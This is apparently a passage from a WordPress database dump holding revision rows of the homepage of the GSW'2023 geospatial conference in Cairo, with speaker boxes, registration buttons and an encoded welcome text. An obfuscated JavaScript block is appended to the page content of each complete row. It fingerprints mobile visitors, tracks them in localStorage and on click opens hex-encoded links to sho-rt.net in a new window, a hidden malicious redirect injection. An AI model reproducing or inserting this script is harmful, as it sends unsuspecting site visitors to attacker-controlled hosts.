_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 13:48:58','2022-10-07 13:48:58','',2167,'https://gsw2023.com/?p=2399',0,'revision','',0),
(2400,1,'2022-10-07 13:50:03','2022-10-07 13:50:03','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182747465{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 13:50:03','2022-10-07 13:50:03','',2167,'https://gsw2023.com/?p=2400',0,'revision','',0),
(2401,1,'2022-10-07 13:51:01','2022-10-07 13:51:01','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0